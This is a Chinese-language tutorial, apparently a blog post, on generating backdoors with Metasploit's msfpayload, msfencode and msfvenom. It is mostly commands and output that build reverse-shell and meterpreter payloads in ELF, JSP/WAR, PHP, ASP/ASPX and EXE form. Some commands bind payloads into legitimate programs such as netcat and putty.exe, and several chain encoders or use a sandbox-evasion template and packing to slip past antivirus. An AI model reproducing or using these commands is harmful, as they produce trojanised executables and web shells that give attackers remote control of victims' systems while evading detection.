目录
msfpayload与msfencode参数说明
2生成backdoor类型
2.1msfpayload生成linux backdoor
2.2msfpayload生成jsp、war backdoor
2.3msfpayload生成php backdoor
2.4msfpayload生成asp、aspx backdoor
2.5msfpayload生成exe backdoor
3msfpayload tips
本文介绍使用msfpayload生成后门,msfencode多payload进行编码处理使其免杀部分杀软.
msfpayload与msfencode参数说明
执行msfpayload -h查看都有哪些参数
?
Usage: /opt/metasploit/msf3/msfpayload [] [var=val]
OPTIONS:
-h Help banner
-l List available payloads
#O--查看payload信息
#R--输出raw原始数据,可以被传输到另一个程序如msfencode或重定向到另一个文件
#C--输出c程序
执行msfencode -h查看都有哪些参数
?
root@bt:/opt/metasploit/msf3# msfencode -h
Usage: /opt/metasploit/msf3/msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff' //避免的字符
-c The number of times to encode the data //编码次数
-d Specify the directory in which to look for EXE templates
-e The encoder to use //选择使用哪种编码器
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders //列出所有可用的编码器
-m Specifies an additional module search path
-n Dump encoder information
-o The output file //输出文件
-p The platform to encode for
-s The maximum size of the encoded data
-t The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war //输出文件的格式
-v Increase verbosity
-x Specify an alternate executable template
root@bt:/opt/metasploit/msf3# msfencode -l
Framework Encoders
==================
Name Rank Description
---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
生成backdoor类型
可以生成asp、aspx、php、jsp、war、exe等多种类型,下面介绍的使用方法就不一一测试了.
msfpayload生成linux backdoor
?
root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.7.102 LPORT=5555 X > linux2
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: {"LHOST"=>"192.168.7.102", "LPORT"=>"5555"}
目标机器运行linux2,本机监听下端口,使用metasploit或者nc都行,测试如下图:
payload与可执行文件绑定运行,如netcat:
?
root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc
[*] x86/alpha_mixed succeeded with size 204 (iteration=1)
高级点的payload meterpreter
?
root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc
可以使用msfpayload -l | grep linux查找,选择合适自己的.
msfpayload生成jsp、war backdoor
?
root@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=10.1.1.1 LPORT=5555 R > door.jsp
生成war格式后门
?
root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=5555 W > door.war
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: {"LHOST"=>"10.0.0.1", "LPORT"=>"5555"}
root@bt:~# unzip door.war
Archive: door.war
inflating: META-INF/MANIFEST.MF
creating: WEB-INF/
inflating: WEB-INF/web.xml
inflating: sbkuvbujlbr.jsp
inflating: sWDYKoedyqBMERb.txt
root@bt:~#
msfpayload生成php backdoor
?
root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e php/base64 -t raw -o base64php.php
[*] php/base64 succeeded with size 1779 (iteration=1)
如果文件开头和结尾木有php的分界符,那么得自己手动gedit/vim base64php.php一下,在头尾加上即可,否则是不成功的.如图:
msfpayload生成asp、aspx backdoor
?
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t asp -o door2.asp
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t aspx -o door.aspx
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
msfpayload生成exe backdoor
?
root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 > /root/Desktop/door.exe
root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 -k -x /root/putty.exe -o /root/Desktop/puttydoor.exe
root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 10 X > shell.bin
root@bt:~#msfpayload windows/shell/reverse_tcp LHOST=10.0.0.1 LPORT=4443 EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t exe -o door.exe
msfpayload tips
目标是内网时,常用的payload选着如:
?
root@bt:~# msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o allports.exe
root@bt:~# msfpayload windows/meterpreter/reverse_http LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o httpports.exe
Antivirus Sandbox Evasion-ultimate-payload.pl
?
$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \
| ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe
[*ultimate] Waiting for payload from STDIN
[*ultimate] Payload: read (size: 367)
[*ultimate] Payload: encode (new size: 1161)
[*ultimate] Template: read 94720 bytes from file
[*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928
[*ultimate] Output: add the begin of the template (size: 36928)
[*ultimate] Output: add the encoded payload (size: 1161)
[*ultimate] Output: add the end of the template (size: 18502)
[*ultimate] File '/tmp/payload.exe' generated (size: 94720)
reverse_https with basic authentication against proxy
msfvenom -p windows/meterpreter/reverse_https_proxy_basicauth \
-f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername \
PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe
还有对生成的payload加壳处理,如upx.
https://www.0x255.com/archives/64